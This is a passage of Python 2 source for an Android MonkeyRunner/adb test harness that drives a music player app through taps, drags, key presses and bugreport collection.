'playlists_menu':['sleepmode','settings','exit',],\n #online page\n 'online':['home','toggle','input','more_albums','new_albums','more_artists','hot_artists',],\n #online page menu\n 'online_menu':['sleepmode','settings','exit',],\n #new\n #singer detail page\n 'singer_detail':['all_songs','random_album'],\n #singer detail menu page\n 'singer_detail_menu':['download_all_cover','sleepmode','settings','exit',],\n #album detail page\n 'album_detail':['randomplayall','randomsong'],\n #album detail menu page\n 'album_detail_menu':['id3','change_album_info','addto','sleepmode','settings','exit',],\n #folder detail page\n 'folder_detail':['randomplayall','randomsong'],\n #folder detail menu page\n 'folder_detail_menu':['id3','addto','sleepmode','settings','exit',],\n #playlist detail page\n 'playlist_detail':['randomplayall','randomsong',],\n #playlist detail menu page\n 'playlist_detail_menu':['id3','addto','sleepmode','settings','exit',],\n #billboard page\n 'billboard':['random_billboard'],\n #billboard menu page\n 'billboard_menu':['sleepmode','settings','exit',],\n #fm page\n 'fm':['random_fm'],\n #fm menu page\n 'fm_menu':['sleepmode','settings','exit',],\n #new\n 'online_album_detail':['home','toggle','play_all','download_single',],\t\t\t\t#28\n 'online_album_detail_menu':['download_all','addto','sleepmode','settings','exit',],\t\t\t\t#29\n 'online_singer_songs':['home','toggle','play_all','download_single',],\t\t\t\t#30 children[0].children[1].children[0] play_all children[0].children[1].children[1].children[1]\n 'online_singer_songs_menu':['download_all','addto','sleepmode','settings','exit',],\t\t\t\t#31\n 'online_singer_albums':['home','toggle','album',],\t\t\t#32 children[1].children[1].children[0] first\n 'online_singer_albums_menu':['sleepmode','settings','exit',],\t\t\t\t#33\n #new\n 'online_more_albums_random':['random_albums'],\n 'online_more_singers_random':['random_singers'],\n },\n }\n\n Key_Code = {\n 'KEYCODE_0':'KEYCODE_0',\n 'KEYCODE_1':'KEYCODE_1',\n 'KEYCODE_2':'KEYCODE_2',\n 'KEYCODE_3':'KEYCODE_3',\n 'KEYCODE_3D_MODE':'KEYCODE_3D_MODE',\n 'KEYCODE_4':'KEYCODE_4',\n 'KEYCODE_5':'KEYCODE_5',\n 'KEYCODE_6':'KEYCODE_6',\n 'KEYCODE_7':'KEYCODE_7',\n 'KEYCODE_8':'KEYCODE_8',\n 'KEYCODE_9':'KEYCODE_9',\n 'KEYCODE_A':'KEYCODE_A',\n 'KEYCODE_ALT_LEFT':'KEYCODE_ALT_LEFT',\n 'KEYCODE_ALT_RIGHT':'KEYCODE_ALT_RIGHT',\n 'KEYCODE_APOSTROPHE':'KEYCODE_APOSTROPHE',\n 'KEYCODE_APP_SWITCH':'KEYCODE_APP_SWITCH',\n 'KEYCODE_ASSIST':'KEYCODE_ASSIST',\n 'KEYCODE_AT':'KEYCODE_AT',\n 'KEYCODE_AVR_INPUT':'KEYCODE_AVR_INPUT',\n 'KEYCODE_AVR_POWER':'KEYCODE_AVR_POWER',\n 'KEYCODE_B':'KEYCODE_B',\n 'KEYCODE_BACK':'KEYCODE_BACK',\n 'KEYCODE_BACKSLASH':'KEYCODE_BACKSLASH',\n 'KEYCODE_BOOKMARK':'KEYCODE_BOOKMARK',\n 'KEYCODE_BREAK':'KEYCODE_BREAK',\n 'KEYCODE_BUTTON_1':'KEYCODE_BUTTON_1',\n 'KEYCODE_BUTTON_10':'KEYCODE_BUTTON_10',\n 'KEYCODE_BUTTON_11':'KEYCODE_BUTTON_11',\n 'KEYCODE_BUTTON_12':'KEYCODE_BUTTON_12',\n 'KEYCODE_BUTTON_13':'KEYCODE_BUTTON_13',\n 'KEYCODE_BUTTON_14':'KEYCODE_BUTTON_14',\n 'KEYCODE_BUTTON_15':'KEYCODE_BUTTON_15',\n 'KEYCODE_BUTTON_16':'KEYCODE_BUTTON_16',\n 'KEYCODE_BUTTON_2':'KEYCODE_BUTTON_2',\n 'KEYCODE_BUTTON_3':'KEYCODE_BUTTON_3',\n 'KEYCODE_BUTTON_4':'KEYCODE_BUTTON_4',\n 'KEYCODE_BUTTON_5':'KEYCODE_BUTTON_5',\n 'KEYCODE_BUTTON_6':'KEYCODE_BUTTON_6',\n 'KEYCODE_BUTTON_7':'KEYCODE_BUTTON_7',\n 'KEYCODE_BUTTON_8':'KEYCODE_BUTTON_8',\n 'KEYCODE_BUTTON_9':'KEYCODE_BUTTON_9',\n 'KEYCODE_BUTTON_A':'KEYCODE_BUTTON_A',\n 'KEYCODE_BUTTON_B':'KEYCODE_BUTTON_B',\n 'KEYCODE_BUTTON_C':'KEYCODE_BUTTON_C',\n 'KEYCODE_BUTTON_L1':'KEYCODE_BUTTON_L1',\n 'KEYCODE_BUTTON_L2':'KEYCODE_BUTTON_L2',\n 'KEYCODE_BUTTON_MODE':'KEYCODE_BUTTON_MODE',\n 'KEYCODE_BUTTON_R1':'KEYCODE_BUTTON_R1',\n 'KEYCODE_BUTTON_R2':'KEYCODE_BUTTON_R2',\n 'KEYCODE_BUTTON_SELECT':'KEYCODE_BUTTON_SELECT',\n 'KEYCODE_BUTTON_START':'KEYCODE_BUTTON_START',\n 'KEYCODE_BUTTON_THUMBL':'KEYCODE_BUTTON_THUMBL',\n 'KEYCODE_BUTTON_THUMBR':'KEYCODE_BUTTON_THUMBR',\n 'KEYCODE_BUTTON_X':'KEYCODE_BUTTON_X',\n 'KEYCODE_BUTTON_Y':'KEYCODE_BUTTON_Y',\n 'KEYCODE_BUTTON_Z':'KEYCODE_BUTTON_Z',\n 'KEYCODE_C':'KEYCODE_C',\n 'KEYCODE_CALCULATOR':'KEYCODE_CALCULATOR',\n 'KEYCODE_CALENDAR':'KEYCODE_CALENDAR',\n 'KEYCODE_CALL':'KEYCODE_CALL',\n 'KEYCODE_CAMERA':'KEYCODE_CAMERA',\n 'KEYCODE_CAPS_LOCK':'KEYCODE_CAPS_LOCK',\n 'KEYCODE_CAPTIONS':'KEYCODE_CAPTIONS',\n 'KEYCODE_CHANNEL_DOWN':'KEYCODE_CHANNEL_DOWN',\n 'KEYCODE_CHANNEL_UP':'KEYCODE_CHANNEL_UP',\n 'KEYCODE_CLEAR':'KEYCODE_CLEAR',\n 'KEYCODE_COMMA':'KEYCODE_COMMA',\n 'KEYCODE_CONTACTS':'KEYCODE_CONTACTS',\n 'KEYCODE_CTRL_LEFT':'KEYCODE_CTRL_LEFT',\n 'KEYCODE_CTRL_RIGHT':'KEYCODE_CTRL_RIGHT',\n 'KEYCODE_D':'KEYCODE_D',\n 'KEYCODE_DEL':'KEYCODE_DEL',\n 'KEYCODE_DPAD_CENTER':'KEYCODE_DPAD_CENTER',\n 'KEYCODE_DPAD_DOWN':'KEYCODE_DPAD_DOWN',\n 'KEYCODE_DPAD_LEFT':'KEYCODE_DPAD_LEFT',\n 'KEYCODE_DPAD_RIGHT':'KEYCODE_DPAD_RIGHT',\n 'KEYCODE_DPAD_UP':'KEYCODE_DPAD_UP',\n 'KEYCODE_DVR':'KEYCODE_DVR',\n 'KEYCODE_E':'KEYCODE_E',\n 'KEYCODE_EISU':'KEYCODE_EISU',\n 'KEYCODE_ENDCALL':'KEYCODE_ENDCALL',\n 'KEYCODE_ENTER':'KEYCODE_ENTER',\n 'KEYCODE_ENVELOPE':'KEYCODE_ENVELOPE',\n 'KEYCODE_EQUALS':'KEYCODE_EQUALS',\n 'KEYCODE_ESCAPE':'KEYCODE_ESCAPE',\n 'KEYCODE_EXPLORER':'KEYCODE_EXPLORER',\n 'KEYCODE_F':'KEYCODE_F',\n 'KEYCODE_F1':'KEYCODE_F1',\n 'KEYCODE_F10':'KEYCODE_F10',\n 'KEYCODE_F11':'KEYCODE_F11',\n 'KEYCODE_F12':'KEYCODE_F12',\n 'KEYCODE_F2':'KEYCODE_F2',\n 'KEYCODE_F3':'KEYCODE_F3',\n 'KEYCODE_F4':'KEYCODE_F4',\n 'KEYCODE_F5':'KEYCODE_F5',\n 'KEYCODE_F6':'KEYCODE_F6',\n 'KEYCODE_F7':'KEYCODE_F7',\n 'KEYCODE_F8':'KEYCODE_F8',\n 'KEYCODE_F9':'KEYCODE_F9',\n 'KEYCODE_FOCUS':'KEYCODE_FOCUS',\n 'KEYCODE_FORWARD':'KEYCODE_FORWARD',\n 'KEYCODE_FORWARD_DEL':'KEYCODE_FORWARD_DEL',\n 'KEYCODE_FUNCTION':'KEYCODE_FUNCTION',\n 'KEYCODE_G':'KEYCODE_G',\n 'KEYCODE_GRAVE':'KEYCODE_GRAVE',\n 'KEYCODE_GUIDE':'KEYCODE_GUIDE',\n 'KEYCODE_H':'KEYCODE_H',\n 'KEYCODE_HEADSETHOOK':'KEYCODE_HEADSETHOOK',\n 'KEYCODE_HENKAN':'KEYCODE_HENKAN',\n 'KEYCODE_HOME':'KEYCODE_HOME',\n 'KEYCODE_I':'KEYCODE_I',\n 'KEYCODE_INFO':'KEYCODE_INFO',\n 'KEYCODE_INSERT':'KEYCODE_INSERT',\n 'KEYCODE_J':'KEYCODE_J',\n 'KEYCODE_K':'KEYCODE_K',\n 'KEYCODE_KANA':'KEYCODE_KANA',\n 'KEYCODE_KATAKANA_HIRAGANA':'KEYCODE_KATAKANA_HIRAGANA',\n 'KEYCODE_L':'KEYCODE_L',\n 'KEYCODE_LANGUAGE_SWITCH':'KEYCODE_LANGUAGE_SWITCH',\n 'KEYCODE_LEFT_BRACKET':'KEYCODE_LEFT_BRACKET',\n 'KEYCODE_M':'KEYCODE_M',\n 'KEYCODE_MANNER_MODE':'KEYCODE_MANNER_MODE',\n 'KEYCODE_MEDIA_CLOSE':'KEYCODE_MEDIA_CLOSE',\n 'KEYCODE_MEDIA_EJECT':'KEYCODE_MEDIA_EJECT',\n 'KEYCODE_MEDIA_FAST_FORWARD':'KEYCODE_MEDIA_FAST_FORWARD',\n 'KEYCODE_MEDIA_NEXT':'KEYCODE_MEDIA_NEXT',\n 'KEYCODE_MEDIA_PAUSE':'KEYCODE_MEDIA_PAUSE',\n 'KEYCODE_MEDIA_PLAY':'KEYCODE_MEDIA_PLAY',\n 'KEYCODE_MEDIA_PLAY_PAUSE':'KEYCODE_MEDIA_PLAY_PAUSE',\n 'KEYCODE_MEDIA_PREVIOUS':'KEYCODE_MEDIA_PREVIOUS',\n 'KEYCODE_MEDIA_RECORD':'KEYCODE_MEDIA_RECORD',\n 'KEYCODE_MEDIA_REWIND':'KEYCODE_MEDIA_REWIND',\n 'KEYCODE_MEDIA_STOP':'KEYCODE_MEDIA_STOP',\n 'KEYCODE_MENU':'KEYCODE_MENU',\n 'KEYCODE_META_LEFT':'KEYCODE_META_LEFT',\n 'KEYCODE_META_RIGHT':'KEYCODE_META_RIGHT',\n 'KEYCODE_MINUS':'KEYCODE_MINUS',\n 'KEYCODE_MOVE_END':'KEYCODE_MOVE_END',\n 'KEYCODE_MOVE_HOME':'KEYCODE_MOVE_HOME',\n 'KEYCODE_MUHENKAN':'KEYCODE_MUHENKAN',\n 'KEYCODE_MUSIC':'KEYCODE_MUSIC',\n 'KEYCODE_MUTE':'KEYCODE_MUTE',\n 'KEYCODE_N':'KEYCODE_N',\n 'KEYCODE_NOTIFICATION':'KEYCODE_NOTIFICATION',\n 'KEYCODE_NUM':'KEYCODE_NUM',\n 'KEYCODE_NUMPAD_0':'KEYCODE_NUMPAD_0',\n 'KEYCODE_NUMPAD_1':'KEYCODE_NUMPAD_1',\n 'KEYCODE_NUMPAD_2':'KEYCODE_NUMPAD_2',\n 'KEYCODE_NUMPAD_3':'KEYCODE_NUMPAD_3',\n 'KEYCODE_NUMPAD_4':'KEYCODE_NUMPAD_4',\n 'KEYCODE_NUMPAD_5':'KEYCODE_NUMPAD_5',\n 'KEYCODE_NUMPAD_6':'KEYCODE_NUMPAD_6',\n 'KEYCODE_NUMPAD_7':'KEYCODE_NUMPAD_7',\n 'KEYCODE_NUMPAD_8':'KEYCODE_NUMPAD_8',\n 'KEYCODE_NUMPAD_9':'KEYCODE_NUMPAD_9',\n 'KEYCODE_NUMPAD_ADD':'KEYCODE_NUMPAD_ADD',\n 'KEYCODE_NUMPAD_COMMA':'KEYCODE_NUMPAD_COMMA',\n 'KEYCODE_NUMPAD_DIVIDE':'KEYCODE_NUMPAD_DIVIDE',\n 'KEYCODE_NUMPAD_DOT':'KEYCODE_NUMPAD_DOT',\n 'KEYCODE_NUMPAD_ENTER':'KEYCODE_NUMPAD_ENTER',\n 'KEYCODE_NUMPAD_EQUALS':'KEYCODE_NUMPAD_EQUALS',\n 'KEYCODE_NUMPAD_LEFT_PAREN':'KEYCODE_NUMPAD_LEFT_PAREN',\n 'KEYCODE_NUMPAD_MULTIPLY':'KEYCODE_NUMPAD_MULTIPLY',\n 'KEYCODE_NUMPAD_RIGHT_PAREN':'KEYCODE_NUMPAD_RIGHT_PAREN',\n 'KEYCODE_NUMPAD_SUBTRACT':'KEYCODE_NUMPAD_SUBTRACT',\n 'KEYCODE_NUM_LOCK':'KEYCODE_NUM_LOCK',\n 'KEYCODE_O':'KEYCODE_O',\n 'KEYCODE_P':'KEYCODE_P',\n 'KEYCODE_PAGE_DOWN':'KEYCODE_PAGE_DOWN',\n 'KEYCODE_PAGE_UP':'KEYCODE_PAGE_UP',\n 'KEYCODE_PERIOD':'KEYCODE_PERIOD',\n 'KEYCODE_PICTSYMBOLS':'KEYCODE_PICTSYMBOLS',\n 'KEYCODE_PLUS':'KEYCODE_PLUS',\n 'KEYCODE_POUND':'KEYCODE_POUND',\n 'KEYCODE_POWER':'KEYCODE_POWER',\n 'KEYCODE_PROG_BLUE':'KEYCODE_PROG_BLUE',\n 'KEYCODE_PROG_GREEN':'KEYCODE_PROG_GREEN',\n 'KEYCODE_PROG_RED':'KEYCODE_PROG_RED',\n 'KEYCODE_PROG_YELLOW':'KEYCODE_PROG_YELLOW',\n 'KEYCODE_Q':'KEYCODE_Q',\n 'KEYCODE_R':'KEYCODE_R',\n 'KEYCODE_RIGHT_BRACKET':'KEYCODE_RIGHT_BRACKET',\n 'KEYCODE_RO':'KEYCODE_RO',\n 'KEYCODE_S':'KEYCODE_S',\n 'KEYCODE_SCROLL_LOCK':'KEYCODE_SCROLL_LOCK',\n 'KEYCODE_SEARCH':'KEYCODE_SEARCH',\n 'KEYCODE_SEMICOLON':'KEYCODE_SEMICOLON',\n 'KEYCODE_SETTINGS':'KEYCODE_SETTINGS',\n 'KEYCODE_SHIFT_LEFT':'KEYCODE_SHIFT_LEFT',\n 'KEYCODE_SHIFT_RIGHT':'KEYCODE_SHIFT_RIGHT',\n 'KEYCODE_SLASH':'KEYCODE_SLASH',\n 'KEYCODE_SOFT_LEFT':'KEYCODE_SOFT_LEFT',\n 'KEYCODE_SOFT_RIGHT':'KEYCODE_SOFT_RIGHT',\n 'KEYCODE_SPACE':'KEYCODE_SPACE',\n 'KEYCODE_STAR':'KEYCODE_STAR',\n 'KEYCODE_STB_INPUT':'KEYCODE_STB_INPUT',\n 'KEYCODE_STB_POWER':'KEYCODE_STB_POWER',\n 'KEYCODE_SWITCH_CHARSET':'KEYCODE_SWITCH_CHARSET',\n 'KEYCODE_SYM':'KEYCODE_SYM',\n 'KEYCODE_SYSRQ':'KEYCODE_SYSRQ',\n 'KEYCODE_T':'KEYCODE_T',\n 'KEYCODE_TAB':'KEYCODE_TAB',\n 'KEYCODE_TV':'KEYCODE_TV',\n 'KEYCODE_TV_INPUT':'KEYCODE_TV_INPUT',\n 'KEYCODE_TV_POWER':'KEYCODE_TV_POWER',\n 'KEYCODE_U':'KEYCODE_U',\n 'KEYCODE_UNKNOWN':'KEYCODE_UNKNOWN',\n 'KEYCODE_V':'KEYCODE_V',\n 'KEYCODE_VOLUME_DOWN':'KEYCODE_VOLUME_DOWN',\n 'KEYCODE_VOLUME_MUTE':'KEYCODE_VOLUME_MUTE',\n 'KEYCODE_VOLUME_UP':'KEYCODE_VOLUME_UP',\n 'KEYCODE_W':'KEYCODE_W',\n 'KEYCODE_WINDOW':'KEYCODE_WINDOW',\n 'KEYCODE_X':'KEYCODE_X',\n 'KEYCODE_Y':'KEYCODE_Y',\n 'KEYCODE_YEN':'KEYCODE_YEN',\n 'KEYCODE_Z':'KEYCODE_Z',\n 'KEYCODE_ZENKAKU_HANKAKU':'KEYCODE_ZENKAKU_HANKAKU',\n 'KEYCODE_ZOOM_IN':'KEYCODE_ZOOM_IN',\n 'KEYCODE_ZOOM_OUT':'KEYCODE_ZOOM_OUT',\n }\n\n def __init__(self):\n self.getDeviceList()\n\n def connectToDevice(self,deviceID,timeout = 10):\n \"\"\"\n connect to device\n \"\"\"\n print('Begin to connectToDevice %s' %deviceID)\n try:\n self.device = MR.waitForConnection(timeout, deviceID)\n #print type(self.device)\n except:\n print('device is '+ str(self.device)+str(Exception))\n os.system(\"adb -s \" + deviceID + \" start-server\")\n print('begin to reconnectToDevice %s' %deviceID)\n self.device = MR.waitForConnection(timeout, deviceID)\n if not self.device:\n print('fail to connectDevice')\n sys.exit()\n\n def getDeviceList(self):\n \"\"\"\n get device_list in adb devices\n \"\"\"\n print('##############getDeviceList##############')\n cmd = 'adb devices'\n dl = os.popen(cmd)\n for line in dl.readlines():\n if 'device' in line:\n if 'List' not in line:\n line = line[:16]\n #print(line)\n self.device_list.append(line)\n\n def getProductType(self):\n \"\"\"\n get product type\n \"\"\"\n print('##############getProductType##############')\n cmd = 'adb -s '+ self.deviceID +' shell getprop | grep ro.product.name'\n result = os.popen(cmd)\n result = result.readline().split(':')\n product = result[len(result)-1].replace('[','')\n product = product.replace(']','')\n product = product.replace(' ','').strip()\n return product\n\n def getRomType(self):\n \"\"\"\n get rom type\n \"\"\"\n print('##############getRomType##############')\n cmd = 'adb -s '+ self.deviceID +' shell getprop | grep ro.product.mod_device'\n result = os.popen(cmd)\n n_result = result.readline()\n if n_result == '':\n rom_type = ''\n else:\n result = n_result.split(':')\n rom_type = result[len(result)-1].replace('[','')\n rom_type = rom_type.replace(']','').strip()\n return rom_type\n\n def getPhoneType(self):\n \"\"\"\n get phone type\n \"\"\"\n print('##############getPhoneType##############')\n product = self.getProductType()\n rom = self.getRomType()\n phone_type = ''\n if product == 'wt93007':\n if rom == '':\n phone_type = 'hm2'\n self.phone = phone_type\n\n def unLock(self):\n \"\"\"\n unlock phone\n \"\"\"\n device = self.device\n print('##############unLock##############')\n self.lockPhone()\n self.wakePhone()\n time.sleep(2)\n device.press(self.Key_Code['KEYCODE_BACK'], MD.DOWN)\n device.press(self.Key_Code['KEYCODE_VOLUME_UP'], MD.DOWN_AND_UP)\n device.press(self.Key_Code['KEYCODE_BACK'], MD.UP)\n time.sleep(2)\n\n def pressKey(self,key='',type=0):\n \"\"\"\n press key\n \"\"\"\n print('pressKey---%s'%key)\n device = self.device\n if type == 1:\n device.press(key,MD.DOWN)\n elif type == 2:\n device.press(key,MD.UP)\n else :\n device.press(key,MD.DOWN_AND_UP)\n time.sleep(1)\n\n def wakePhone(self):\n \"\"\"\n wake phone\n \"\"\"\n device = self.device\n print('##############wakePhone##############')\n device.wake()\n time.sleep(1)\n\n def lockPhone(self):\n \"\"\"\n lock phone\n \"\"\"\n device = self.device\n print('##############lockPhone##############')\n device.press(self.Key_Code['KEYCODE_POWER'], MD.DOWN_AND_UP)\n time.sleep(1)\n\n def lauchPlayer(self):\n \"\"\"\n lauch music player\n \"\"\"\n device_id = self.deviceID\n print('##############lauchPlayer##############')\n activity_name = self.activity_name\n cmd = 'adb -s ' + device_id + ' shell am start -n ' + activity_name\n os.popen(cmd)\n print('lauchPlayer | please wait 5 sec')\n time.sleep(5)\n\n def killPlayer(self):\n \"\"\"\n kill music player\n \"\"\"\n device_id = self.deviceID\n print('##############killPlayer##############')\n package_name = self.package_name\n Popen(['adb', '-s', device_id, 'shell', 'am', 'kill',package_name ]).wait()\n Popen(['adb', '-s', device_id, 'shell', 'am', 'force-stop',package_name]).wait()\n time.sleep(1)\n self.pressKey(self.Key_Code['KEYCODE_HOME'])\n time.sleep(1)\n\n def touchButton(self,phone = '',page = '',button = ''):\n \"\"\"\n touch buttons\n \"\"\"\n print('touchButton--%s--%s'%(page,button))\n point = self.button_pos[phone][page][button]\n self.touchDevice(point['x'], point['y'])\n time.sleep(2)\n\n def touchDevice(self,x=0,y=0):\n \"\"\"\n device touch action\n \"\"\"\n device = self.device\n print('touchDevice--(%d,%d)'%(x,y))\n device.touch(x,y,MD.DOWN_AND_UP)\n time.sleep(3)\n\n def touchConfirmCancel(self,tt=''):\n \"\"\"\n touchConfirmCancel\n \"\"\"\n print('touchConfirmCancel--%s'%tt)\n phone = self.phone\n button = self.confirm_cancel[phone][tt]\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n\n def dragDevice(self,orig_x=0,orig_y=0,to_x=0,to_y=0):\n \"\"\"\n drag action\n \"\"\"\n device = self.device\n start = (orig_x,orig_y)\n end = (to_x,to_y)\n duration = 0.2\n steps = 10\n time.sleep(1)\n device.drag(start, end, duration, steps)\n time.sleep(2)\n\n def inputText(self):\n \"\"\"\n inputText\n \"\"\"\n device = self.device\n txt = ''\n chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'\n length = len(chars) - 1\n random_length = random.randint(2,8)\n for i in range(random_length):\n txt+=chars[random.randint(0, length)]\n print('######inputText:%s'%txt)\n shell_text = 'input text ' + txt\n device.shell(shell_text)\n time.sleep(2)\n\n def longPress(self,phone='',page='',button=''):\n \"\"\"\n longPress\n \"\"\"\n print('longPress--%s,%s'%(page,button))\n device = self.device\n point = self.button_pos[phone][page][button]\n orig_x = point['x']\n orig_y = point['y']\n start = (orig_x,orig_y)\n end = (orig_x,orig_y)\n duration = 1\n steps = 10\n device.drag(start, end, duration, steps)\n time.sleep(1)\n\n def dragPage(self,direct='left'):\n \"\"\"\n drag action\n \"\"\"\n print('##############dragPage:%s##############'% direct)\n d_width,d_height = self.getDeviceWH()\n orig_x = d_width/3\n orig_y = d_height/3\n to_x = d_width*2/3\n to_y = d_height/3\n if direct == 'left':\n orig_x = d_width/3\n orig_y = d_height*2/3\n to_x = d_width*2/3\n to_y = d_height*2/3\n elif direct == 'right':\n orig_x = d_width*2/3\n orig_y = d_height*2/3\n to_x = d_width/3\n to_y = d_height*2/3\n elif direct == 'top':\n orig_x = d_width/2\n orig_y = d_height/3\n to_x = d_width/2\n to_y = d_height*2/3\n elif direct == 'bottom':\n orig_x = d_width/2\n orig_y = d_height*2/3\n to_x = d_width/2\n to_y = d_height/3\n self.dragDevice(orig_x,orig_y,to_x,to_y)\n\n def getDeviceWH(self):\n \"\"\"\n get device height and width\n \"\"\"\n print('--getDeviceWH--')\n device = self.device\n d_width = int(device.getProperty('display.width'))\n d_height = int(device.getProperty('display.height'))\n return d_width,d_height\n\n def getTime(self,time_format=''):\n \"\"\"\n get time in format like 2013-3-3\n \"\"\"\n time_value = ''\n year,mon,day= time.strftime('%Y'),time.strftime('%m'),time.strftime('%d')\n hms = time.strftime('%H-%M-%S')\n block = '-'\n mon = str(int(mon))\n day = str(int(day))\n ymd = year + block + mon + block + day\n ymd_hms = ymd + '-' + hms\n if time_format == 'ymd':\n time_value = ymd\n else:\n time_value = ymd_hms\n return time_value\n\n def getLog(self):\n \"\"\"\n get device height and width\n \"\"\"\n phone = self.phone\n print('##############getLog:%s##############'% phone)\n device_id = self.deviceID\n phone = string.upper(phone)\n print('Begin get bugreport')\n ymd = self.getTime('ymd')\n ymd_hms = self.getTime('ymd_hms')\n log_name = phone + '-' + ymd_hms + '-log.txt'\n cmd = 'adb -s ' + device_id + ' bugreport > ' + log_name\n os.system(cmd)\n path_name = ymd + '/'\n path_exist = os.path.exists(path_name)\n if not path_exist:\n print('Make dir %s: '% ymd)\n os.mkdir(ymd)\n print('Move log file %s to dir: %s.'%(log_name,path_name))\n cmd_mv_log = 'mv ' + log_name + ' ' + path_name\n os.popen(cmd_mv_log)\n print('End get bugreport')\n print('Begin analyse bugreport')\n jar = 'java -jar chkbugreport.jar '\n log_file = path_name + log_name\n bugreport_analyse = jar + log_file\n os.popen(bugreport_analyse)\n print('End analyse bugreport')\n\n def getViewPoint(self,phone='',page = ''):\n \"\"\"\n get view point value\n \"\"\"\n device = self.device\n hms = time.strftime('%H:%M:%S')\n print('##############getViewPoint:phone=%s,page=%s @ time %s##############'%(phone,page,hms))\n time.sleep(1)\n d_width,d_height = self.getDeviceWH()\n menu_height = 0\n eof = False\n if page in self.page_list and phone in self.phone_list:\n eof = True\n if not eof:\n print('##############Incorrect page or phone##############')\n return False\n else:\n viewer = device.getHierarchyViewer()\n viewer_type = type(viewer)\n #print(v_type)\n if viewer_type:\n id = self.id_list[phone][page]\n #print(id)\n find_by_id = viewer.findViewById(id)\n fbi_type = type(find_by_id)\n #print(f_type)\n time.sleep(2)\n if fbi_type:\n buttons = []\n buttons_names = self.button_list[phone][page]\n if page == 'musichome':\n #'musichome':['main_play_button','songs','singers','albums','folders','playlists','online'],\n buttons.append(find_by_id.children[6].children[0])\n for j in xrange(2):\n for i in xrange(3):\n buttons.append(find_by_id.children[5].children[2].children[0].children[j].children[i])\n elif page == 'nowplaying':\n #'nowplaying':['home','equalizer','prev','pause','next','repeat','toggle'],\n for i in xrange(len(buttons_names)):\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n #'nowplaying':['up','playlist_indicator','repeat','repeat','favorite','info','prev','pause','next'],\n elif page == 'songs':\n #'songs':['home','toggle','randomplayall','randomsong',],\n child = len(find_by_id.children)\n if child >6:\n child = 6\n rnd = random.randint(1,child-1)\n for i in xrange(len(buttons_names)):\n if 'random' not in buttons_names[i]:\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n else:\n if 'all' in page:\n buttons.append(find_by_id.children[0])\n else:\n buttons.append(find_by_id.children[rnd])\n elif page == 'singers':\n #'singers':['home','toggle','randomsinger',],\n child = len(find_by_id.children)\n if child >6:\n child = 6\n rnd = random.randint(0,child-1)\n for i in xrange(len(buttons_names)):\n if 'random' not in buttons_names[i]:\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n else:\n buttons.append(find_by_id.children[rnd])\n elif page == 'albums':\n #'albums':['home','toggle','randomalbum',],\n child = len(find_by_id.children)\n if child >6:\n child = 6\n rnd = random.randint(0,child-1)\n for i in xrange(len(buttons_names)):\n if 'random' not in buttons_names[i]:\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n else:\n buttons.append(find_by_id.children[rnd])\n elif page == 'folders':\n #'folders':['home','toggle','randomfolder',],\n child = len(find_by_id.children)\n if child > 6:\n child = 6\n rnd = random.randint(0,child-1)\n for i in xrange(len(buttons_names)):\n if 'random' not in buttons_names[i]:\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n else:\n buttons.append(find_by_id.children[rnd])\n elif page == 'playlists':\n #'playlists':['home','toggle','favorite','recentlyplayed','recentlyadded','mostplayed','newlist',]\n for i in xrange(len(buttons_names)):\n if i < 2:\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n else:\n if i < (len(buttons_names)-1):\n buttons.append(find_by_id.children[i-2])\n else:\n ids = 'id/'+ 'v5_icon_menu_bar_primary_item'\n buttons.append(viewer.findViewById(ids))\n elif page == 'online':\n #'online':['home','toggle','input','more_albums','new_albums','more_artists','hot_artists',],\n for i in xrange(len(buttons_names)):\n ids = 'id/'+buttons_names[i]\n list_view = viewer.findViewById(ids)\n if i < 4 or i == 5:\n buttons.append(list_view)\n else:\n rnd = 0\n if i == 4:\n rnd = random.randint(0,5)\n elif i == 6:\n rnd = random.randint(0,2)\n buttons.append(list_view.children[0].children[1].children[rnd].children[0])\n elif page == 'singer_detail':\n #'singer_detail':['all_songs','random_album'],\n #'singer_detail':'id/list',# 0 rnd\n child = len(find_by_id.children)\n if child >6:\n child = 6\n buttons.append(find_by_id.children[0])\n rnd = random.randint(1,child-1)\n buttons.append(find_by_id.children[rnd])\n elif page == 'album_detail':\n #'album_detail':['randomplayall','randomsong'],\n #'album_detail':'id/list',#0 rnd\n child = len(find_by_id.children)\n if child >6:\n child = 6\n buttons.append(find_by_id.children[0])\n rnd = random.randint(1,child-1)\n buttons.append(find_by_id.children[rnd])\n elif page == 'folder_detail':\n #'folder_detail':['randomplayall','randomsong'],\n #'folder_detail':'id/list',#0 rnd\n child = len(find_by_id.children)\n if child >6:\n child = 6\n buttons.append(find_by_id.children[0])\n rnd = random.randint(1,child-1)\n buttons.append(find_by_id.children[rnd])\n elif page == 'playlist_detail':\n #'playlist_detail':['randomplayall',],\n #'playlist_detail':'id/list',#0 rnd\n child = len(find_by_id.children)\n if child >6:\n child = 6\n buttons.append(find_by_id.children[0])\n rnd = random.randint(1,child-1)\n buttons.append(find_by_id.children[rnd])\n elif page == 'billboard':\n #'billboard':['random_billboard'],\n #'billboard':'id/view_pager',#children[1].children[1].children[rnd]\n child = len(find_by_id.children[1].children[1].children)\n rnd = random.randint(0,1)\n buttons.append(find_by_id.children[1].children[1].children[rnd])\n elif page == 'fm':\n #'fm':['random_fm'],\n #'fm':'id/view_pager',#children[2].children[1].children[rnd]\n child = len(find_by_id.children[2].children[1].children)\n if child >6:\n child = 6\n rnd = random.randint(0,child-1)\n buttons.append(find_by_id.children[2].children[1].children[rnd])\n elif page == 'online_album_detail':\n #'online_album_detail':['home','toggle','play_all','download_single',],\t\t\t\t#28\n child = len(find_by_id.children)\n if child < 6:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n rnd = random.randint(0,1)\n if rnd == 0:\n directs = 'top'\n else:\n directs = 'bottom'\n self.dragPage(directs)\n page = self.page_dict['online_more_albums_random']\n button = self.button_list[phone][page][0]\n self.touchButton(phone,page,button)\n page = self.page_dict['online_album_detail']\n self.getViewPoint(phone,page)\n else:\n for i in xrange(len(buttons_names)):\n if i < 2:\n ids = 